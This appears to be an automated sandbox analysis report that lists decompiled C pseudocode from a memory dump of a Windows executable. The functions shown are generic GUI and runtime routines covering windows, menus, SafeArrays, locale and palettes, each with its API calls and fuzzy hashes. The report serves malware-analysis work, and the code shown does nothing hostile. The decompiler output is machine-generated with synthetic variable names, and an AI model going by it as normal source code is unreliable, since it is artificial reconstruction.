			E004298CC(intOrPtr __eax, void* __ecx, intOrPtr _a4) {
				char _v5;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				struct HWND__* _v24;
				intOrPtr _v28;
				char _v32;
				struct tagRECT _v48;
				struct tagRECT _v64;
				struct HWND__* _t53;
				intOrPtr _t55;
				intOrPtr _t60;
				intOrPtr _t65;
				intOrPtr _t78;
				intOrPtr _t84;
				intOrPtr _t86;
				intOrPtr _t93;
				intOrPtr _t98;
				intOrPtr _t101;
				void* _t102;
				intOrPtr* _t104;
				intOrPtr _t106;
				intOrPtr _t110;
				intOrPtr _t112;
				struct HWND__* _t113;
				intOrPtr _t114;
				intOrPtr _t116;
				intOrPtr _t117;

				_t102 = __ecx;
				_t101 = __eax;
				_v5 = 1;
				_t113 = E00429D1C(_a4 + 0xfffffff7);
				_v24 = _t113;
				_t53 = GetWindow(_t113, 4);
				_t104 =  *0x479fc4; // 0x47bb9c
				_t4 =  *_t104 + 0x30; // 0x502b4
				if(_t53 ==  *_t4) {
					L6:
					if(_v24 == 0) {
						L25:
						return _v5;
					}
					_t114 = _t101;
					while(1) {
						_t55 =  *((intOrPtr*)(_t114 + 0x30));
						if(_t55 == 0) {
							break;
						}
						_t114 = _t55;
					}
					_t112 = E0043260C(_t114);
					_v28 = _t112;
					if(_t112 == _v24) {
						goto L25;
					}
					_t13 = _a4 - 0x10; // 0xe87d83e8
					_t60 =  *((intOrPtr*)( *_t13 + 0x30));
					if(_t60 == 0) {
						_t19 = _a4 - 0x10; // 0xe87d83e8
						_t106 =  *0x428474; // 0x4284c0
						__eflags = E00403604( *_t19, _t106);
						if(__eflags == 0) {
							__eflags = 0;
							_v32 = 0;
						} else {
							_t21 = _a4 - 0x10; // 0xe87d83e8
							_v32 = E0043260C( *_t21);
						}
						L19:
						_v12 = 0;
						_t65 = _a4;
						_v20 =  *((intOrPtr*)(_t65 - 9));
						_v16 =  *((intOrPtr*)(_t65 - 5));
						_push( &_v32);
						_push(E00429860);
						_push(GetCurrentThreadId());
						L00406714();
						_t126 = _v12;
						if(_v12 == 0) {
							goto L25;
						}
						GetWindowRect(_v24,  &_v48);
						_push(_a4 + 0xfffffff7);
						_push(_a4 - 1);
						E00403674(_t101, _t126);
						_t78 =  *0x47bb1c; // 0x0
						_t110 =  *0x427254; // 0x4272a0
						if(E00403604(_t78, _t110) == 0) {
							L23:
							if(IntersectRect( &_v48,  &_v48,  &_v64) != 0) {
								_v5 = 0;
							}
							goto L25;
						}
						_t84 =  *0x47bb1c; // 0x0
						if( *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x38)) + 0xa0)) == 0) {
							goto L23;
						}
						_t86 =  *0x47bb1c; // 0x0
						if(E0043260C( *((intOrPtr*)( *((intOrPtr*)(_t86 + 0x38)) + 0xa0))) == _v24) {
							goto L25;
						}
						goto L23;
					}
					_t116 = _t60;
					while(1) {
						_t93 =  *((intOrPtr*)(_t116 + 0x30));
						if(_t93 == 0) {
							break;
						}
						_t116 = _t93;
					}
					_v32 = E0043260C(_t116);
					goto L19;
				}
				_t117 = E00428E38(_v24, _t102);
				if(_t117 == 0) {
					goto L25;
				} else {
					while(1) {
						_t98 =  *((intOrPtr*)(_t117 + 0x30));
						if(_t98 == 0) {
							break;
						}
						_t117 = _t98;
					}
					_v24 = E0043260C(_t117);
					goto L6;
				}
			}

0x004298cc
0x004298d5
0x004298d7
0x004298e6
0x004298e8
0x004298ee
0x004298f3
0x004298fb
0x004298fe
0x00429927
0x0042992b
0x00429a5a
0x00429a63
0x00429a63
0x00429931
0x00429937
0x00429937
0x0042993c
0x00000000
0x00000000
0x00429935
0x00429935
0x00429945
0x00429947
0x0042994d
0x00000000
0x00000000
0x00429956
0x00429959
0x0042995e
0x0042997f
0x00429982
0x0042998d
0x0042998f
0x004299a1
0x004299a3
0x00429991
0x00429994
0x0042999c
0x0042999c
0x004299a6
0x004299a6
0x004299aa
0x004299b0
0x004299b6
0x004299bc
0x004299bd
0x004299c7
0x004299c8
0x004299cd
0x004299d1
0x00000000
0x00000000
0x004299df
0x004299ea
0x004299ef
0x004299ff
0x00429a04
0x00429a09
0x00429a16
0x00429a41
0x00429a54
0x00429a56
0x00429a56
0x00000000
0x00429a54
0x00429a18
0x00429a27
0x00000000
0x00000000
0x00429a29
0x00429a3f
0x00000000
0x00000000
0x00000000
0x00429a3f
0x00429963
0x00429969
0x00429969
0x0042996e
0x00000000
0x00000000
0x00429967
0x00429967
0x00429977
0x00000000
0x00429977
0x00429908
0x0042990c
0x00000000
0x00429912
0x00429916
0x00429916
0x0042991b
0x00000000
0x00000000
0x00429914
0x00429914
0x00429924
0x00000000
0x00429924

APIs

Part of subcall function 00429D1C: WindowFromPoint.USER32(00429AF6,0047BB40,00000000,004298E6,?,-0000000C,?), ref: 00429D22
Part of subcall function 00429D1C: GetParent.USER32(00000000), ref: 00429D39

GetWindow.USER32(00000000,00000004), ref: 004298EE
GetCurrentThreadId.KERNEL32 ref: 004299C2
GetWindowRect.USER32(00000000,?), ref: 004299DF
IntersectRect.USER32(?,?,?), ref: 00429A4D

Part of subcall function 00428E38: GetWindowThreadProcessId.USER32(?), ref: 00428E45
Part of subcall function 00428E38: GetCurrentProcessId.KERNEL32(?,?,?,00000000,00000000,00429908,?,-0000000C,?), ref: 00428E4E
Part of subcall function 00428E38: GlobalFindAtomA.KERNEL32(00000000), ref: 00428E63
Part of subcall function 00428E38: GetPropA.USER32(?,00000000), ref: 00428E7A

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: Window$CurrentProcessRectThread$AtomFindFromGlobalIntersectParentPointProp
String ID:
API String ID: 2049660638-0
Opcode ID: 408ef24fb3915b696d4c857943abfe534249f1f0a128b7e5cd293e15de008396
Instruction ID: bbdd6da2919a956a64e9bc75f4e392a7f55fee3a30584de8f181e23d5aeb018a
Opcode Fuzzy Hash: 408ef24fb3915b696d4c857943abfe534249f1f0a128b7e5cd293e15de008396
Instruction Fuzzy Hash: 86517F71B002189FCB10DF69D481BAEB7F4AF08354F54816AE845EB391D738EE41CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040EC7C, Relevance: 6.1, APIs: 4, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0040EC7C(intOrPtr* __eax) {
				char _v260;
				char _v768;
				char _v772;
				intOrPtr* _v776;
				signed short* _v780;
				char _v784;
				signed int _v788;
				char _v792;
				intOrPtr* _v796;
				signed char _t43;
				intOrPtr* _t60;
				void* _t79;
				void* _t81;
				void* _t84;
				void* _t85;
				intOrPtr* _t92;
				void* _t96;
				char* _t97;
				void* _t98;

				_v776 = __eax;
				if(( *(_v776 + 1) & 0x00000020) == 0) {
					E0040EB48(0x80070057);
				}
				_t43 =  *_v776;
				if((_t43 & 0x00000fff) == 0xc) {
					if((_t43 & 0x00000040) == 0) {
						_v780 =  *((intOrPtr*)(_v776 + 8));
					} else {
						_v780 =  *((intOrPtr*)( *((intOrPtr*)(_v776 + 8))));
					}
					_v788 =  *_v780 & 0x0000ffff;
					_t79 = _v788 - 1;
					if(_t79 >= 0) {
						_t85 = _t79 + 1;
						_t96 = 0;
						_t97 =  &_v772;
						do {
							_v796 = _t97;
							_push(_v796 + 4);
							_t22 = _t96 + 1; // 0x1
							_push(_v780);
							L0040DD58();
							E0040EB48(_v780);
							_push( &_v784);
							_t25 = _t96 + 1; // 0x1
							_push(_v780);
							L0040DD60();
							E0040EB48(_v780);
							 *_v796 = _v784 -  *((intOrPtr*)(_v796 + 4)) + 1;
							_t96 = _t96 + 1;
							_t97 = _t97 + 8;
							_t85 = _t85 - 1;
						} while (_t85 != 0);
					}
					_t81 = _v788 - 1;
					if(_t81 >= 0) {
						_t84 = _t81 + 1;
						_t60 =  &_v768;
						_t92 =  &_v260;
						do {
							 *_t92 =  *_t60;
							_t92 = _t92 + 4;
							_t60 = _t60 + 8;
							_t84 = _t84 - 1;
						} while (_t84 != 0);
						do {
							goto L12;
						} while (E0040EC20(_t83, _t98) != 0);
						goto L15;
					}
					L12:
					_t83 = _v788 - 1;
					if(E0040EBF0(_v788 - 1, _t98) != 0) {
						_push( &_v792);
						_push( &_v260);
						_push(_v780);
						L0040DD68();
						E0040EB48(_v780);
						E0040EE74(_v792);
					}
				}
				L15:
				_push(_v776);
				L0040D8F4();
				return E0040EB48(_v776);
			}

0x0040ec88
0x0040ec98
0x0040ec9f
0x0040ec9f
0x0040ecaa
0x0040ecb8
0x0040ecc7
0x0040ece5
0x0040ecc9
0x0040ecd4
0x0040ecd4
0x0040ecf4
0x0040ed00
0x0040ed03
0x0040ed05
0x0040ed06
0x0040ed08
0x0040ed0e
0x0040ed10
0x0040ed1f
0x0040ed20
0x0040ed2a
0x0040ed2b
0x0040ed30
0x0040ed3b
0x0040ed3c
0x0040ed46
0x0040ed47
0x0040ed4c
0x0040ed67
0x0040ed69
0x0040ed6a
0x0040ed6d
0x0040ed6d
0x0040ed0e
0x0040ed76
0x0040ed79
0x0040ed7b
0x0040ed7c
0x0040ed82
0x0040ed88
0x0040ed8a
0x0040ed8c
0x0040ed8f
0x0040ed92
0x0040ed92
0x0040ed95
0x00000000
0x00000000
0x00000000
0x0040ed95
0x0040ed95
0x0040ed9c
0x0040eda7
0x0040edaf
0x0040edb6
0x0040edbd
0x0040edbe
0x0040edc3
0x0040edce
0x0040edce
0x0040eddc
0x0040ede0
0x0040ede6
0x0040ede7
0x0040edf7

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040ED2B
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040ED47
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040EDBE
VariantClear.OLEAUT32(?), ref: 0040EDE7

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: ArraySafe$Bound$ClearIndexVariant
String ID:
API String ID: 920484758-0
Opcode ID: 222dfd55f4586741cf6c642e18797c671bdcc356e7018be82b80e885789c82a2
Instruction ID: 21ced035a400a35a4c92a9fc9132514a7d541c61c58b6200b60ec4ca9853bd29
Opcode Fuzzy Hash: 222dfd55f4586741cf6c642e18797c671bdcc356e7018be82b80e885789c82a2
Instruction Fuzzy Hash: C3411F759002199FCB62DB5ACC90AC9B3BCEF48304F0045EAE649B7352DA34AF948F58

Uniqueness

Uniqueness Score: -1.00%

Function 0040C510, Relevance: 6.1, APIs: 4, Instructions: 97
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040C510() {
				char* _v28;
				char _v156;
				short _v414;
				signed short _t16;
				signed int _t18;
				int _t20;
				void* _t22;
				void* _t25;
				int _t26;
				int _t30;
				signed int _t34;
				signed int _t35;
				signed int _t36;
				signed int _t41;
				int* _t43;
				short* _t44;
				void* _t52;

				 *0x47b738 = 0x409;
				 *0x47b73c = 9;
				 *0x47b740 = 1;
				_t16 = GetThreadLocale();
				if(_t16 != 0) {
					 *0x47b738 = _t16;
				}
				if(_t16 != 0) {
					 *0x47b73c = _t16 & 0x3ff;
					 *0x47b740 = (_t16 & 0x0000ffff) >> 0xa;
				}
				memcpy(0x479110, 0x40c668, 8 << 2);
				if( *0x4790c8 != 2) {
					_t18 = GetSystemMetrics(0x4a);
					__eflags = _t18;
					 *0x47b745 = _t18 & 0xffffff00 | _t18 != 0x00000000;
					_t20 = GetSystemMetrics(0x2a);
					__eflags = _t20;
					_t35 = _t34 & 0xffffff00 | _t20 != 0x00000000;
					 *0x47b744 = _t35;
					__eflags = _t35;
					if(__eflags != 0) {
						return E0040C498(__eflags, _t52);
					}
				} else {
					_t22 = E0040C4F8();
					if(_t22 != 0) {
						 *0x47b745 = 0;
						 *0x47b744 = 0;
						return _t22;
					}
					E0040C498(__eflags, _t52);
					_t41 = 0x20;
					_t25 = E00402FA8(0x479110, 0x20, 0x40c668);
					_t36 = _t34 & 0xffffff00 | __eflags != 0x00000000;
					 *0x47b744 = _t36;
					__eflags = _t36;
					if(_t36 != 0) {
						 *0x47b745 = 0;
						return _t25;
					}
					_t26 = 0x80;
					_t43 =  &_v156;
					do {
						 *_t43 = _t26;
						_t26 = _t26 + 1;
						_t43 =  &(_t43[0]);
						__eflags = _t26 - 0x100;
					} while (_t26 != 0x100);
					_v28 =  &_v156;
					_t30 =  *0x47b738; // 0x409
					GetStringTypeA(_t30, 2, _v28, 0x80,  &_v414);
					_t20 = 0x80;
					_t44 =  &_v414;
					while(1) {
						__eflags =  *_t44 - 2;
						_t41 = _t41 & 0xffffff00 |  *_t44 == 0x00000002;
						 *0x47b745 = _t41;
						__eflags = _t41;
						if(_t41 != 0) {
							goto L17;
						}
						_t44 = _t44 + 2;
						_t20 = _t20 - 1;
						__eflags = _t20;
						if(_t20 != 0) {
							continue;
						} else {
							return _t20;
						}
						L18:
					}
				}
				L17:
				return _t20;
				goto L18;
			}

0x0040c51c
0x0040c526
0x0040c530
0x0040c53a
0x0040c541
0x0040c543
0x0040c543
0x0040c54b
0x0040c557
0x0040c563
0x0040c563
0x0040c577
0x0040c580
0x0040c635
0x0040c63a
0x0040c63f
0x0040c646
0x0040c64b
0x0040c64d
0x0040c650
0x0040c656
0x0040c658
0x00000000
0x0040c660
0x0040c586
0x0040c586
0x0040c58d
0x0040c58f
0x0040c596
0x00000000
0x0040c596
0x0040c5a3
0x0040c5b3
0x0040c5b5
0x0040c5ba
0x0040c5bd
0x0040c5c3
0x0040c5c5
0x0040c5c7
0x00000000
0x0040c5c7
0x0040c5d3
0x0040c5d8
0x0040c5de
0x0040c5de
0x0040c5e0
0x0040c5e1
0x0040c5e2
0x0040c5e2
0x0040c5ef
0x0040c604
0x0040c60a
0x0040c60f
0x0040c614
0x0040c61a
0x0040c61a
0x0040c61e
0x0040c621
0x0040c627
0x0040c629
0x00000000
0x00000000
0x0040c62b
0x0040c62e
0x0040c62e
0x0040c62f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040c62f
0x0040c61a
0x0040c667
0x0040c667
0x00000000

APIs

GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040C60A
GetThreadLocale.KERNEL32 ref: 0040C53A

Part of subcall function 0040C498: GetCPInfo.KERNEL32(00000000,?), ref: 0040C4B1

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: InfoLocaleStringThreadType
String ID:
API String ID: 1505017576-0
Opcode ID: 22f6e89dbcfc3dc8776c89fd5e43eb4b745ab72a5bba2d12a6cd6b8fbb2797da
Instruction ID: 90b006cfb23b63b7da1e610c4884db5ce379cd136e4bf50f6a6a468e9ef9f15f
Opcode Fuzzy Hash: 22f6e89dbcfc3dc8776c89fd5e43eb4b745ab72a5bba2d12a6cd6b8fbb2797da
Instruction Fuzzy Hash: F5315721500354DED7209735AC827AA3794EB82305F84417BE84CAB3C2DB3D4885C7EE

Uniqueness

Uniqueness Score: -1.00%

Function 0043F5A4, Relevance: 6.1, APIs: 4, Instructions: 72
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0043F5A4(void* __eax, struct HMENU__* __edx, int _a4, int _a8, CHAR* _a12) {
				intOrPtr _v8;
				void* __ecx;
				void* __edi;
				int _t27;
				void* _t40;
				int _t41;
				int _t50;

				_t50 = _t41;
				_t49 = __edx;
				_t40 = __eax;
				if(E0043EC80(__eax) == 0) {
					return GetMenuStringA(__edx, _t50, _a12, _a8, _a4);
				}
				_v8 = 0;
				if((GetMenuState(__edx, _t50, _a4) & 0x00000010) == 0) {
					_t27 = GetMenuItemID(_t49, _t50);
					_t51 = _t27;
					if(_t27 != 0xffffffff) {
						_v8 = E0043EAFC(_t40, 0, _t51);
					}
				} else {
					_t49 = GetSubMenu(_t49, _t50);
					_v8 = E0043EAFC(_t40, 1, _t37);
				}
				if(_v8 == 0) {
					return 0;
				} else {
					 *_a12 = 0;
					E00408704(_a12, _a8,  *((intOrPtr*)(_v8 + 0x30)));
					return E00408640(_a12, _t49);
				}
			}

0x0043f5ab
0x0043f5ad
0x0043f5af
0x0043f5ba
0x00000000
0x0043f63e
0x0043f5be
0x0043f5ce
0x0043f5eb
0x0043f5f0
0x0043f5f5
0x0043f602
0x0043f602
0x0043f5d0
0x0043f5d7
0x0043f5e4
0x0043f5e4
0x0043f609
0x00000000
0x0043f60b
0x0043f60e
0x0043f61d
0x00000000
0x0043f625

APIs

GetMenuState.USER32(?,?,?), ref: 0043F5C7
GetSubMenu.USER32(?,?), ref: 0043F5D2
GetMenuItemID.USER32(?,?), ref: 0043F5EB
GetMenuStringA.USER32(?,?,?,?,?), ref: 0043F63E

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: Menu$ItemStateString
String ID:
API String ID: 306270399-0
Opcode ID: b15a0b98d861f5cd5f58b237bcbcd170f15f212fee3379aef1c169b5d66f75ad
Instruction ID: b813469a94bc0a242b0835a6068308d9acfb0f37e51f5ff621fc8c3c287841f4
Opcode Fuzzy Hash: b15a0b98d861f5cd5f58b237bcbcd170f15f212fee3379aef1c169b5d66f75ad
Instruction Fuzzy Hash: D711AF31A05114AFC700EF6E8C82AAF77E8AF4D368F20543BF805D7391D6789D069768

Uniqueness

Uniqueness Score: -1.00%

Function 00448608, Relevance: 6.1, APIs: 4, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00448608(void* __eax) {
				void* _t16;
				void* _t37;
				void* _t38;
				signed int _t41;

				_t16 = __eax;
				_t38 = __eax;
				if(( *(__eax + 0x1c) & 0x00000010) == 0 &&  *0x479ba4 != 0) {
					_t16 = E0043286C(__eax);
					if(_t16 != 0) {
						_t41 = GetWindowLongA(E0043260C(_t38), 0xffffffec);
						if( *((char*)(_t38 + 0x2e0)) != 0 ||  *((char*)(_t38 + 0x2e8)) != 0) {
							if((_t41 & 0x00080000) == 0) {
								SetWindowLongA(E0043260C(_t38), 0xffffffec, _t41 | 0x00080000);
							}
							return  *0x479ba4(E0043260C(_t38),  *((intOrPtr*)(_t38 + 0x2ec)),  *((intOrPtr*)(_t38 + 0x2e1)),  *0x00479C28 |  *0x00479C30);
						} else {
							SetWindowLongA(E0043260C(_t38), 0xffffffec, _t41 & 0xfff7ffff);
							_push(0x485);
							_push(0);
							_push(0);
							_t37 = E0043260C(_t38);
							_push(_t37);
							L0040698C();
							return _t37;
						}
					}
				}
				return _t16;
			}

0x00448608
0x0044860a
0x00448610
0x00448625
0x0044862c
0x00448641
0x0044864a
0x0044865b
0x0044866e
0x0044866e
0x00000000
0x004486b0
0x004486c1
0x004486c6
0x004486cb
0x004486cd
0x004486d1
0x004486d6
0x004486d7
0x00000000
0x004486d7
0x0044864a
0x0044862c
0x004486de

APIs

GetWindowLongA.USER32(00000000,000000EC), ref: 0044863C
SetWindowLongA.USER32(00000000,000000EC,00000000), ref: 0044866E
SetLayeredWindowAttributes.USER32(00000000,?,?,00000000,00000000,000000EC,?,?,004461F4), ref: 004486A8
SetWindowLongA.USER32(00000000,000000EC,00000000), ref: 004486C1

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: eb12b681c861b6fa3a3468ffafc3e4f303ffc185e3ad86889964486942611ac9
Instruction ID: fd451d871bfa946b5a99569279126de3649089d83a1f5304be9f8fabb38908c5
Opcode Fuzzy Hash: eb12b681c861b6fa3a3468ffafc3e4f303ffc185e3ad86889964486942611ac9
Instruction Fuzzy Hash: A111ABB06082D419DB50BB794D89B4B3B981F09314F05557E7949EB2D7C97CC844876C

Uniqueness

Uniqueness Score: -1.00%

Function 0041A954, Relevance: 6.1, APIs: 4, Instructions: 59
registryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0041A954(intOrPtr _a4, short _a6, intOrPtr _a8) {
				struct _WNDCLASSA _v44;
				struct HINSTANCE__* _t6;
				CHAR* _t8;
				struct HINSTANCE__* _t9;
				int _t10;
				void* _t11;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t19;
				CHAR* _t20;
				struct HWND__* _t22;
				CHAR* _t24;

				_t6 =  *0x47b660; // 0x400000
				 *0x479400 = _t6;
				_t8 =  *0x479414; // 0x41a944
				_t9 =  *0x47b660; // 0x400000
				_t10 = GetClassInfoA(_t9, _t8,  &_v44);
				asm("sbb eax, eax");
				_t11 = _t10 + 1;
				if(_t11 == 0 || L0040668C != _v44.lpfnWndProc) {
					if(_t11 != 0) {
						_t19 =  *0x47b660; // 0x400000
						_t20 =  *0x479414; // 0x41a944
						UnregisterClassA(_t20, _t19);
					}
					RegisterClassA(0x4793f0);
				}
				_t13 =  *0x47b660; // 0x400000
				_t24 =  *0x479414; // 0x41a944
				_t22 = E00406B8C(0x80, _t24, 0, _t13, 0, 0, 0, 0, 0, 0, 0x80000000);
				if(_a6 != 0) {
					SetWindowLongA(_t22, 0xfffffffc, E0041A898(_a4, _a8));
				}
				return _t22;
			}

0x0041a95b
0x0041a960
0x0041a969
0x0041a96f
0x0041a975
0x0041a97d
0x0041a97f
0x0041a982
0x0041a990
0x0041a992
0x0041a998
0x0041a99e
0x0041a99e
0x0041a9a8
0x0041a9a8
0x0041a9be
0x0041a9cb
0x0041a9db
0x0041a9e2
0x0041a9f3
0x0041a9f3
0x0041a9fe

APIs

GetClassInfoA.USER32(00400000,0041A944,?), ref: 0041A975
UnregisterClassA.USER32(0041A944,00400000), ref: 0041A99E
RegisterClassA.USER32(004793F0), ref: 0041A9A8
SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0041A9F3

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: Class$InfoLongRegisterUnregisterWindow
String ID:
API String ID: 4025006896-0
Opcode ID: 79b50d5c5a438a967481b2006713c30b0d12274214d7c3a86695096d7b6c5ce5
Instruction ID: ae3135c9e79ccd4dcef4f7c11ca33282a84e7a751fcc53b044c6d2bc61941cc8
Opcode Fuzzy Hash: 79b50d5c5a438a967481b2006713c30b0d12274214d7c3a86695096d7b6c5ce5
Instruction Fuzzy Hash: 3B0152B12541086BCB10EF58DC81F9A33A9E708318F118536F909E72E1D7399CE5C7AE

Uniqueness

Uniqueness Score: -1.00%

Function 0044A2F4, Relevance: 6.1, APIs: 4, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0044A2F4(void* __eax, void* __ecx, char __edx) {
				char _v12;
				struct HWND__* _v20;
				int _t17;
				void* _t27;
				struct HWND__* _t33;
				void* _t35;
				void* _t36;
				long _t37;

				_t37 = _t36 + 0xfffffff8;
				_t27 = __eax;
				_t17 =  *0x47bb9c; // 0x2321704
				if( *((intOrPtr*)(_t17 + 0x30)) != 0) {
					if( *((intOrPtr*)(__eax + 0x94)) == 0) {
						 *_t37 =  *((intOrPtr*)(__eax + 0x30));
						_v12 = __edx;
						EnumWindows(E0044A284, _t37);
						_t17 =  *(_t27 + 0x90);
						if( *((intOrPtr*)(_t17 + 8)) != 0) {
							_t33 = GetWindow(_v20, 3);
							_v20 = _t33;
							if((GetWindowLongA(_t33, 0xffffffec) & 0x00000008) != 0) {
								_v20 = 0xfffffffe;
							}
							_t17 =  *(_t27 + 0x90);
							_t35 =  *((intOrPtr*)(_t17 + 8)) - 1;
							if(_t35 >= 0) {
								do {
									_t17 = SetWindowPos(E00413E68( *(_t27 + 0x90), _t35), _v20, 0, 0, 0, 0, 0x213);
									_t35 = _t35 - 1;
								} while (_t35 != 0xffffffff);
							}
						}
					}
					 *((intOrPtr*)(_t27 + 0x94)) =  *((intOrPtr*)(_t27 + 0x94)) + 1;
				}
				return _t17;
			}

0x0044a2f6
0x0044a2f9
0x0044a2fb
0x0044a304
0x0044a311
0x0044a31a
0x0044a31d
0x0044a329
0x0044a32e
0x0044a338
0x0044a346
0x0044a348
0x0044a355
0x0044a357
0x0044a357
0x0044a35e
0x0044a367
0x0044a36b
0x0044a36d
0x0044a38d
0x0044a392
0x0044a393
0x0044a36d
0x0044a36b
0x0044a338
0x0044a398
0x0044a398
0x0044a3a2

APIs

EnumWindows.USER32(Function_0004A284), ref: 0044A329
GetWindow.USER32(?,00000003), ref: 0044A341
GetWindowLongA.USER32(00000000,000000EC), ref: 0044A34E
SetWindowPos.USER32(00000000,000000EC,00000000,00000000,00000000,00000000,00000213,00000000,000000EC,?,00000003,Function_0004A284), ref: 0044A38D

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: Window$EnumLongWindows
String ID:
API String ID: 4191631535-0
Opcode ID: 48d6bf516528ee174cba6ebad1448ea62d4c4e36b2ef7bdcb4e8b29264931c63
Instruction ID: 2cd13647c8dd889e59654f65fa4ccde03fc349b64cd3b4df7b002fd8f15e812c
Opcode Fuzzy Hash: 48d6bf516528ee174cba6ebad1448ea62d4c4e36b2ef7bdcb4e8b29264931c63
Instruction Fuzzy Hash: 39119E316847009FEB11EE2CC885F9A7398AB45724F15027AFD98AB6D2C3789C50CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 0041E1A8, Relevance: 6.1, APIs: 4, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E0041E1A8(struct HDC__* __eax, signed int __ecx) {
				char _v1036;
				signed int _v1038;
				struct tagRGBQUAD _v1048;
				short _v1066;
				short* _t15;
				void* _t18;
				struct HDC__* _t23;
				void* _t26;
				short* _t31;
				short* _t32;

				_t31 = 0;
				 *_t32 = 0x300;
				if(__eax == 0) {
					_v1038 = __ecx;
					E00402C48(_t26, __ecx << 2,  &_v1036);
				} else {
					_push(0);
					L00406484();
					_t23 = __eax;
					_t18 = SelectObject(__eax, __eax);
					_v1066 = GetDIBColorTable(_t23, 0, 0x100,  &_v1048);
					SelectObject(_t23, _t18);
					DeleteDC(_t23);
				}
				if(_v1038 != 0) {
					if(_v1038 != 0x10 || E0041E110(_t32) == 0) {
						E0041DFA0( &_v1036, _v1038 & 0x0000ffff);
					}
					_t15 = _t32;
					_push(_t15);
					L004064AC();
					_t31 = _t15;
				}
				return _t31;
			}

0x0041e1b3
0x0041e1b5
0x0041e1bd
0x0041e1f7
0x0041e205
0x0041e1bf
0x0041e1bf
0x0041e1c1
0x0041e1c6
0x0041e1ca
0x0041e1e3
0x0041e1ea
0x0041e1f0
0x0041e1f0
0x0041e210
0x0041e218
0x0041e22e
0x0041e22e
0x0041e233
0x0041e235
0x0041e236
0x0041e23b
0x0041e23b
0x0041e248

APIs

SelectObject.GDI32(00000000,00000000), ref: 0041E1CA
